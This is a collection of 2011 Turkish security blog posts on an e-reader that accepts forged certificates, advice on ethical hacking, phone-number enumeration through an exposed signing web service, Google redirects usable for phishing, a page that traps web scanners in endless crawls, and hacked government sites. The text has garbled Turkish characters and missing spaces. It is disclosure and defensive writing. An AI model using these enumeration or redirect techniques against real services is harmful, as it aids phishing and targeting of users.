Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

